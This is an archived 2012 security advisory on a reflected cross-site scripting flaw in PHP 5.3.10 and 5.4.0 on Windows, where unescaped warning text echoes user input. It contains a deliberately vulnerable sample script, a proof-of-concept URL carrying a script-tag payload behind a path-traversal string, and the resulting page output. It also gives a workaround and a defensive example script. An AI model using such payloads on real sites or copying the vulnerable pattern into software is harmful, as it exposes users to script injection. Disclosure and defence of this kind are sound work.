SECURITYVULNS:DOC:27915
History: Apr 09, 2012 - 12:00 a.m.

php(5.3.10-5.4.0)_XSS_vulns.txt

2012-04-09 00:00:00
vulners.com

=============================================================================================
Vulnerable Software: PHP 5.3.10/5.4.0

php-5.3.10-Win32-VC9-x86.zip (MD5 SUM: af452dfa681ae03ff42eea6d1c7348cd )
php-5.4.0-Win32-VC9-x86.zip (MD5 SUM: b1b0abe883f84eb6d76793aabf1aa612 )
Downloaded From: windows.php.net

Tested:
OS:Windows NT SRV2003-A1W2LOM 5.2 build 3790 (Windows Server 2003 Enterprise Edition) i586
Apache from apachelounge.com: Version: 2.2.22.0
=============================INFO============================================================
PHP 5.3.10
OS:Windows NT SRV2003-A1W2LOM 5.2 build 3790 (Windows Server 2003 Enterprise Edition) i586
PHP Version 5.3.10
Build Date Feb 2 2012 20:26:31
Compiler MSVC9 (Visual C++ 2008)
Architecture x86
Configure Command cscript /nologo configure.js
"--enable-snapshot-build" "--disable-isapi" "--enable-debug-pack" "--disable-isapi" "--without-mssql"
"--without-pdo-mssql" "--without-pi3web" "--with-pdo-oci=C:\php-sdk\oracle\instantclient10\sdk,shared"
"--with-oci8=C:\php-sdk\oracle\instantclient10\sdk,shared" "--with-oci8-11g=C:\php-sdk\oracle\instantclient11\sdk,shared"
"--enable-object-out-dir=../obj/" "--enable-com-dotnet" "--with-mcrypt=static" "--disable-static-analyze"

PHP 5.4.0
OS:Windows NT SRV2003-A1W2LOM 5.2 build 3790 (Windows Server 2003 Enterprise Edition) i586
Build Date Feb 29 2012 19:20:16
Compiler MSVC9 (Visual C++ 2008)
Architecture x86
Configure Command cscript /nologo configure.js "--enable-snapshot-build"
"--disable-isapi" "--enable-debug-pack" "--disable-nsapi" "--without-mssql"
"--without-pdo-mssql" "--without-pi3web" "--with-pdo-oci=C:\php-sdk\oracle\instantclient10\sdk,shared"
"--with-oci8=C:\php-sdk\oracle\instantclient10\sdk,shared" "--with-oci8-11g=C:\php-sdk\oracle\instantclient11\sdk,shared"
"--enable-object-out-dir=../obj/" "--enable-com-dotnet" "--with-mcrypt=static" "--disable-static-analyze" "--with-pgo"

Vuln Desc: Cross Site Scripting Vulnerabilities.
Reason: misconfiguration in the php.ini-* file concerning the => html_errors <= directive,
plus insufficient sanitization when generating warnings whose text can be manipulated from the client side.
The problem is that PHP 5.3.10's php.ini "says":
//Snippet from php.ini-production (This also applies to php.ini-development except display_errors)
---------SNIP STUFF ------------------------
display_errors = off
----- SOME CONFIGURATION SNIP------------
; When PHP displays or logs an error, it has the capability of inserting html
; links to documentation related to that error. This directive controls whether
; those HTML links appear in error messages or not. For performance and security
; reasons, it's recommended you disable this on production servers.
; Note: This directive is hardcoded to Off for the CLI SAPI
; Default Value: On
; Development Value: On
; Production value: Off
; http://php.net/html-errors
html_errors = off
------------EOF SNIP STUFF------------------------

I agree with display_errors = off; it works as expected, but…
Simply switch display_errors from Off to On (display_errors = On).
Restart Apache
and exploit it
(let's say this is the vulnerable script on the server, e.g.:)

cat step2.php
/* BEGIN */
<?php

if(isset($_GET['test']))
{

file_get_contents($_GET['test']); // line 6: a failed open emits a warning that echoes the unsanitized parameter

}

?>
/* = EOF */

Exploit:
http://192.168.0.15/bypass/work/step2.php?test=../../../../../../../../../../../../../../<script>alert(document.location);</script>

From the page source (note that PHP did not HTML-encode it: a non-persistent cross site scripting vuln):

Warning: file_get_contents(): Unable to access ../../../../../../../../../../../../../../<script>alert(document.location);</script> in C:\Program Files\Apache2.2\Apache2\htdocs\bypass\work\step2.php on line 6

Warning: file_get_contents(../../../../../../../../../../../../../../<script>alert(document.location);</script>): failed to open stream: No such file or directory in C:\Program Files\Apache2.2\Apache2\htdocs\bypass\work\step2.php on line 6

Print screen:
http://s019.radikal.ru/i634/1204/d8/ec8485e212bc.png

The whole problem is that html_errors = off doesn't work as expected. (Am I confused, or ?)

(Note: in PHP version 5.4.0's php.ini-production, html_errors=On (<= in this state it is disabled). This means it is off by default, because PHP 5.4.10 is also prone to this.
For testing, change it to Off. It is also vulnerable.)

It "thinks" the Off state is On and vice versa (Off is On).
You can confirm it simply:
change it to On, restart Apache and try to exploit it as below (it will not work in this case).
Here is the output after changing to the => html_errors=On <= state:

From the page source (note that it is HTML-encoded and safe now):
<br />
<b>Warning</b>: file_get_contents(../../../../../../../../../../../../../../&lt;script&gt;alert(1);&lt;/script&gt;) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: Invalid argument in <b>C:\Program Files\Apache2.2\Apache2\htdocs\bypass\work\step2.php</b> on line <b>6</b><br />

In fact, on production servers => display_errors = off <= is the default, which suppresses all of this output (and mitigates this issue).

Here are my md5 sums:

[email protected] /cygdrive/c/temp/mydirsnap
$ md5sum php-5.3.10-Win32-VC9-x86.zip
af452dfa681ae03ff42eea6d1c7348cd *php-5.3.10-Win32-VC9-x86.zip <= It is from my VirtualBox (same md5 sum)

[email protected] /cygdrive/c/temp/mydirsnap
$ md5sum 2/php-5.3.10-Win32-VC9-x86.zip
af452dfa681ae03ff42eea6d1c7348cd *2/php-5.3.10-Win32-VC9-x86.zip <= Just downloaded from windows.php.net (same md5 sum. See bottom)

[email protected] /cygdrive/c/temp/mydirsnap
$ ls -liaR
.:
total 15436
44754521297054585 drwxrwxrwt+ 1 Гость Отсутствует 0 Apr 8 22:57 .
3659174697249195 drwxrwxrwt+ 1 Domain Отсутствует 0 Apr 8 22:57 ..
5629499534273522 drwxrwxrwt+ 1 Гость Отсутствует 0 Apr 8 23:01 2
3659174697298844 -rwxrwxrwx+ 1 Гость Отсутствует 15805513 Feb 13 00:37 php-5.3.10-Win32-VC9-x86.zip <= It is from my VirtualBox

./2:
total 15436
5629499534273522 drwxrwxrwt+ 1 Гость Отсутствует 0 Apr 8 23:01 .
44754521297054585 drwxrwxrwt+ 1 Гость Отсутствует 0 Apr 8 22:57 ..
26177172834151436 -rwxrwxrwx+ 1 user Отсутствует 15805513 Apr 8 22:12 php-5.3.10-Win32-VC9-x86.zip <= Just downloaded from windows.php.net

[email protected] /cygdrive/c/temp/mydirsnap

Note: not tested under Linux; tested only under Windows Server 2003.

********************************************** Workaround*******************************************
After playing with html_errors=on/off, test your server as shown above.
Turn off display_errors in your php.ini (suppress all errors and warnings and do not output
anything to the client side).
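As an added example (not from the advisory and not PHP's own code), the script below reports how the current display_errors/html_errors pair would render a warning, then applies the workaround at runtime so a warning cannot reach the client; the data directory and the handler name are assumptions for the demo.

```php
<?php
// Added example, not part of the original advisory: report how the current
// display_errors / html_errors settings would render a warning, then apply the
// workaround at runtime so a warning can never be echoed to the client.
// Assumes PHP >= 5.3; the "data" directory is an assumption for the demo.

// Defensive handler: keep the full message server-side and never echo it.
function safe_error_handler($errno, $errstr, $errfile, $errline)
{
    error_log(sprintf('[%d] %s in %s:%d', $errno, $errstr, $errfile, $errline));
    return true; // handled: PHP's built-in (echoing) error display is skipped
}

// Summarise the exposure implied by the ini settings the advisory plays with.
function warning_exposure_report()
{
    $display = filter_var(ini_get('display_errors'), FILTER_VALIDATE_BOOLEAN);
    $html    = filter_var(ini_get('html_errors'), FILTER_VALIDATE_BOOLEAN);
    if (!$display) {
        return 'display_errors=Off: warnings never reach the client';
    }
    return $html
        ? 'display_errors=On, html_errors=On: warning text is HTML-escaped before output'
        : 'display_errors=On, html_errors=Off: warning text is echoed raw (reflected XSS)';
}

$report = warning_exposure_report();

// Workaround from the advisory applied at runtime: stop client-side display
// and take over error handling for the rest of this request.
ini_set('display_errors', '0');
set_error_handler('safe_error_handler');

// Same call as step2.php, but the user value is reduced to a bare file name
// inside a fixed directory (assumed for the demo) before it is used.
$base = __DIR__ . DIRECTORY_SEPARATOR . 'data';
$name = isset($_GET['test']) ? basename($_GET['test']) : '';
if ($name !== '') {
    $content = file_get_contents($base . DIRECTORY_SEPARATOR . $name);
    if ($content === false) {
        // The E_WARNING went to safe_error_handler(); reply without echoing input.
        echo "file not found\n";
    } else {
        echo htmlspecialchars($content, ENT_QUOTES, 'UTF-8');
    }
}

echo $report, "\n";
```

Requesting the script with the advisory's test parameter now yields only "file not found" plus the settings report, while the warning (including the raw parameter) lands in the server error log.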


/AkaStep ^_^
Greetz to all:
packetstormsecurity.*, securityfocus.com, cxsecurity.com, security.nnov.ru, securityvulns.com and to all others!
Thank you.